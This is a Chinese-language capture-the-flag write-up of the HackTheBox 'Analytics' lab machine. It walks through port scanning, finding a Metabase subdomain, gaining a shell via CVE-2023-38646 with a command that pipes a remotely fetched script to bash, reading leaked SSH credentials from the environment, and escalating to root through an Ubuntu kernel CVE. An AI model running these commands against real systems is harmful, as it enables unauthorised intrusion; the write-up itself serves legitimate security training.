HackTheBox—Analytics靶机

打靶训练第六台

这台靶机的难度应该是目前最简单的一台了,利用的都是比较新的CVE漏洞。

简介

一台新的Linux机器,在HTB官方难度为easy模式。

信息收集

启动靶机 确定靶机IP 然后测试本地与靶机的连接性。

image-20231011182526515
image-20231011182552362

测试连接成功。

使用nmap对 靶机进行开放端口扫描

nmap -sV 10.10.11.233
image-20231011182805030

开放端口为 22 和 80端口。

访问靶机 80端口。

image-20231011183044431

感觉是一个静态的前端页面,也没有得到建站CMS类型。

除了有一个登录口 进入登录口的界面。

使用路径扫描 看是否可以得到敏感信息。

dirsearch -u http://analytical.htb/

没有得到什么有效的路径信息。

尝试进行下host碰撞 将登录口跳转的data 子域名配合靶机的IP加入host文件中。

image-20231011193815543

成功访问

反弹shell

是Metabase 感觉是一个组件。直接谷歌查找一下有没有相关漏洞

有新鲜的漏洞信息。

国外有位师傅写了利用工具

https://github.com/robotmikhro/CVE-2023-38646

访问链接将工具下载下来。

首先在目录下一个反弹shell,然后启动服务。

image-20231011200542217

然后使用下载下来的工具

python3 single.py -u http://data.analytical.htb -c 'curl 10.10.14.30/1.sh |bash'
image-20231011200615091

注意1.sh| 之间要加空格 我开始打的时候 忘了加空格 结果半天没有反弹shell。

然后启动监听服务。

成功反弹shell。

image-20231011200739053
image-20231011201601186

发现有docker 的env文件 那么现在多半是在一个docker的容器里面。

输入env查看当前环境

image-20231011202029976
image-20231011202143513

开始还没发现。这个其实就是ssh的账号和密码

META_USER=metalytics   
META_PASS=An4lytics_ds20223#

成功连接ssh。

image-20231011202512841

权限提升

这里没有suid 和sudo -l直接尝试内核提权。

uname -a
image-20231011202627031

感觉是一个比较新的版本了。

使用kali里面的漏洞库进行提权 感觉不太现实。于是直接去谷歌查找最新漏洞。

image-20231011201159654

最后成功找到相关方案

https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/

https://cn-sec.com/archives/2062358.html

image-20231011203550364

成功反弹回来root权限。

image-20231011203856454

总结

这台机器难度比较简单 前期通过nday getshell但是那个时候 我们进去的是docker 容器里面 需要查找env配置文件得到ssh连接的账号密码。真正的拿下机器的普通用户权限。然后通过内核提权的方式进行权限提升。